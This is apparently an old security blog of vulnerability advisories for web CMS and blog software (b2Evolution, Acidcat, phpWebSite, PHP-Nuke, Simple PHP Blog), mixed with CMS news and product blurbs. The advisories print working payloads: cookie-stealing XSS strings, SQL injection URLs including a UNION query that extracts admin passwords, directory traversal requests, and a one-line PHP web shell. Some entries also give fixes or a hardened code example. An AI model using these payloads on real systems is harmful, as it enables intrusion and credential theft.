Monday, February 26, 2007
XSS in b2Evolution
Vulnerable versions:
0.9.0.12, 0.9.1, 1.6-alpha, 1.8.6, 1.9.1-beta
Exploit:
http://[site.com]/htsrv/login.php?redirect_to=%22%20onmouseover=%22alert(document.cookie)
(one string; it was wrapped across two lines in the original post)
Monday, July 10, 2006
PluggedOut Blog SQL INJECTION and XSS
PluggedOut Blog is an open source script you can run on your web server to give
you an online multi-user journal or diary.
It can be used equally well for any kind of calendar application. Rather than
give you a thousand things you don't really want ...
PluggedOut Blog : http://www.pluggedout.com/
Credit:
The information has been provided by Hamid Ebadi (Hamid Network Security Team):
admin@hamid.ir
The original article can be found at:
http://hamid.ir/security/
Vulnerable Systems:
PluggedOut Blog Version 1.9.9c (2006-01-13)
Example:
The following URL can be used to trigger an SQL injection vulnerability in the exec.php:
http://[PluggedOut Blog]/exec.php?action=comment_add&entryid=[SQL INJECTION]
and XSS
http://[PluggedOut Blog]/problem.php?id=1&data=>script<alert
('Hamid Network Security Team --> http://hamid.ir');alert(document.cookie)>/script<
Acidcat ASP CMS Multiple Vulnerabilities
It is free for non-commercial use. Acidcat CMS is also an open source product.
The product has been found to contain multiple security vulnerabilities that allow a remote attacker to retrieve the administrator username and password.
Acidcat ASP CMS: http://www.acidcat.com
Credit:
The information has been provided by Hamid Ebadi (Hamid Network Security Team): admin@hamid.ir
The original article can be found at: http://hamid.ir/security/
Vulnerable Systems:
* Acidcat CMS v 2.1.13 and below
Example :
The following URL can be used to trigger an SQL injection vulnerability in the main_content.asp page: http://localhost/acidcat/default.asp?ID=1'
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'ID = 1'''.
/main_content.asp, line 16
Vulnerable Code:
The following lines in main_content.asp
Item.Source = "SELECT * FROM Item WHERE ID = "+ Item__MMColParam.replace(/'/g, "''") + "";
Exploit:
The following URL illustrates how easily the administrator username and password can be retrieved:
http://localhost/acidcat/default.asp?ID=26 union select 1,username,3,password,5,6 from Configuration
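The vulnerable line above doubles single quotes, but the ID is concatenated into the WHERE clause without surrounding quotes, so a payload that contains no quote at all passes through untouched. The following is an added example (not Acidcat's code) that puts that builder next to a hardened version which accepts only a plain integer; the sample IDs are constructed from the URLs in this advisory.

```javascript
// Added example, not Acidcat's code: the ID is concatenated into the WHERE
// clause without surrounding quotes, so doubling single quotes (the only
// "escaping" main_content.asp performs) cannot stop a numeric-context injection.

// Vulnerable builder: the same quote-doubling pattern as the advisory's line.
function buildQueryVulnerable(idParam) {
  return "SELECT * FROM Item WHERE ID = " + idParam.replace(/'/g, "''") + "";
}

// Hardened builder: accept only a plain decimal integer before embedding it.
// Whitelisting the value is the minimal fix for this pattern; a parameterised
// command would be better still.
function buildQueryHardened(idParam) {
  if (typeof idParam !== "string" || !/^\d{1,9}$/.test(idParam)) {
    throw new Error("rejected ID parameter: " + JSON.stringify(idParam));
  }
  return "SELECT * FROM Item WHERE ID = " + Number(idParam);
}

// True when the hardened builder rejects a value that the vulnerable one
// would have handed to the database unchanged.
function hardenedRejects(idParam) {
  try {
    buildQueryHardened(idParam);
    return false;
  } catch (e) {
    return true;
  }
}

// Constructed inputs modelled on the advisory's URLs.
const SAMPLE_IDS = [
  "26",                                                           // normal request
  "1'",                                                           // probe that yields the ODBC syntax error
  "26 union select 1,username,3,password,5,6 from Configuration", // the UNION payload
];

for (const id of SAMPLE_IDS) {
  console.log(JSON.stringify(id));
  console.log("  vulnerable -> " + buildQueryVulnerable(id));
  console.log("  hardened   -> " + (hardenedRejects(id) ? "rejected" : buildQueryHardened(id)));
}
```

Note that the quote-doubling still produces `ID = 1''` for the probe value, which is exactly the expression the ODBC error message quotes.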
The login page is at:
http://localhost/acidcat/main_login.asp
Database Download:
In a default installation the database itself can be downloaded over the web; it is located at http://localhost/acidcat/databases/acidcat.mdb
Sunday, March 06, 2005
PHP include in phpWebSite
Summary:
Anyone who has permission to add announcements can upload a PHP script as a .gif file and execute it.
Example:
http://[target]/images/announce/[anyname].gif.php?nst=ls -la
where [anyname].gif.php is a PHP script containing this line:
passthru($_GET[nst]);
Vulnerable Systems: phpWebSite <= 0.10.0
Official Website: phpWebSite
Multiple Vulnerabilities in PHP-Nuke (db.php, index.php, Downloads, Web_Links)
Summary
Php-Nuke is "a popular open source content management system, written in PHP by Francisco Burzi. This CMS is used on many thousands websites, because it's freeware, easy to install and manage and has broad set of features". Multiple vulnerabilities were found in PHP-Nuke that result in Path Disclosure and Cross Site Scripting.
Credit:
The information has been provided by Janek Vind. The original article can be found at: waraxe.us
Details
Vulnerable Systems:
* PHP-Nuke version 6.0 up to version 7.6
Path Disclosure:
There are several path disclosures in PHP-Nuke when any of the following sample URLs are accessed:
http://localhost/nuke75/db/db.php
http://localhost/nuke75/index.php?inside_mod=1
http://localhost/nuke75/modules.php?name=Downloads&d_op=menu
http://localhost/nuke75/modules.php?name=Web_Links&l_op=menu
Cross Site Scripting
There are two parameters in the modules.php file that are vulnerable to Cross Site Scripting attacks:
Friday, January 14, 2005
Interview with Lee Eason
He said some interesting things, for example that PostNuke's greatest weakness is also its greatest strength: the modular nature of the system. Lee is also the author and director of pnFlashGames and pnFlashGames.com, and he said that pnFlashGames has a weakness too: "Well, the weakest part of my module is the pnHTML I think"
So read the interview :-)
Thursday, January 13, 2005
New Microsoft CMS Book Released
The book presumes a working knowledge of the .NET Framework and familiarity with the C# language, but no prior knowledge of MCMS is required.
The following topics are covered in detail:
The basic concepts of MCMS
Preparing, installing and configuring MCMS and its supporting technologies
Creating an MCMS website from scratch
Creating and debugging templates files and channel rendering scripts
Working with dynamic navigation
Establishing user roles and rights
Authoring with MCMS and improving the authoring experience
Understanding and customizing workflow
Working with the Publishing API
Site deployment techniques
Enhancing your site's performance with caching
Source: http://www.cmswire.com/cms/web-cms/new-microsoft-cms-book-released-000502.php
Shop: http://www.packtpub.com/book/mcms
Tuesday, January 11, 2005
Angelinecms 0.7 screenshots
Here are some screenshots from the future version of angelinecms:
New user manager: shot1, shot2
New group manager: shot1, shot2
Source: Couple 0.7 screenshots
Simple PHP Blog Directory Traversal
Summary
Simple PHP Blog requires "no database to create a blog system but instead only requires PHP 4 (or greater) and write permission on the server". Two vulnerabilities in Simple PHP Blog, caused by inadequate testing for directory traversal attacks, allow a remote attacker to view arbitrary files and create arbitrary directories.
Credit: The information has been provided by Madelman.
Details
Vulnerable Systems: * Simple PHP Blog version 0.3.7r1 and prior
Immune Systems: * Simple PHP Blog version 0.3.7r2 or newer
We can read any file with a .txt extension (in this example /etc/X11/rgb.txt):
Request: http://[SERVER]/sphpblog/comments.php?y=05&m=01&entry=../../../../../../../etc/X11/rgb
This returns the content of the file.
We can also create arbitrary folders in the file system; the content of the post will be saved in that folder. To create the folder http://[SERVER]/sphpblog/createdir/:
Request (this must be a POST request and the entry parameter must be modified): http://[SERVER]/sphpblog/comment_add_cgi.php, entry=../../../createdir
Source: Securiteam
b2Evolution 'title' SQL Injection
b2evolution is "probably the most comprehensive blog engine you can find". An SQL injection vulnerability has been found in b2evolution's 'title' parameter, allowing a remote attacker to cause the program to include arbitrary SQL statements inside its existing statement.
Credit: The information has been provided by r0ut3r.
Details
Exploit: The following URL will trigger the vulnerability:
http://vulnerable/index.php?blog=1&title='&more=1&c=1&tb=1&pb=1
Workaround:
1: manual edit:
Open the file /blogs/b2evocore/_class_itemlist.php and find the following code around lines 197-201:
Code:
// if a post urltitle is specified, load that post
if( !empty( $title ) ) { $where .= " AND post_urltitle = '$title'"; }
Replace these lines like this:
Code:
// if a post urltitle is specified, load that post
if( !empty( $title ) ) { $where .= ' AND post_urltitle = '.$DB->quote($title); }
2: patch files
Download the following file: b2evo-0-9-0-11-fix.zip, unzip it and replace the two enclosed files in the blogs/b2evocore folder. This second method also fixes a small, harmless bug that would cause an error when testing whether the SQL injection issue is fixed.
Source (bug): Securiteam
Source (workaround): b2evolution forums.
wp-plugins
Developers can:
Host their development for free
Be assured of high visibility
Manage their code using an SVN client
Track issues (bugs) using the tracker
Provide documentation using the wiki with the help of end-users.
WordPress Users can:
Browse all the plugins and themes.
Download plugins and themes from one location.
Provide feedback to plugin developers using the tracker. Help improve the plugin or theme.
Develop documentation at the wiki page for the plugins they use.
Stay in the loop using the RSS feeds.
Source: http://wordpress.org/development/
BLOG:CMS
Features?
An overview of the most important BLOG:CMS features is given below.
Standards compliance
BLOG:CMS is probably the only system that is not only W3C valid, but also serves pages with the application/xhtml+xml MIME type by default, for top performance on modern browsers like Mozilla, Firefox, Safari and Opera. BLOG:CMS will also automatically serve the older standard, text/html, to browsers which cannot handle this, like obsolete Microsoft Internet Explorer.
Maintenance of one or more weblogs/news-sites
With BLOG:CMS, you can set up one or more weblogs. If you want to, you can even show the contents of multiple weblogs on the same page.
Integrated Forum
With BLOG:CMS, you can host discussions of your articles either in your weblog or in a forum. This gives you many more possibilities and more freedom for larger discussions. BLOG:CMS members are automatically registered in your forum as well, and within your weblog you can see the date and time of the last forum post for each article.
Integrated Photo Gallery
Today, when digital cameras are more common than traditional ones, a personal presentation without a photo gallery is almost unthinkable. BLOG:CMS ships with the Singapore Photo Gallery, using GD2 and/or ImageMagick to create thumbnails.
Wiki engine
A wiki engine is a great tool for any documentation needs and for collaboration on projects. Anybody can add information to a wiki resource. Some of the world's biggest knowledge resources are based on wiki engines. BLOG:CMS comes with the DokuWiki engine, one of the best, and standards compliant.
Download!
You can always download the latest release of BLOG:CMS at sourceforge.net. Both a zip archive for Windows users and a tar.gz archive for GNU/Linux users are provided.
These releases are currently available:
Release 3.5 - weblog, forum, photo gallery, news, wiki and contact sections (2350 KB): blogcms.3.5.2.pl3.zip (recommended).
Release 3.4 - weblog and contact sections (1150 KB): blogcms.3.4.final.zip.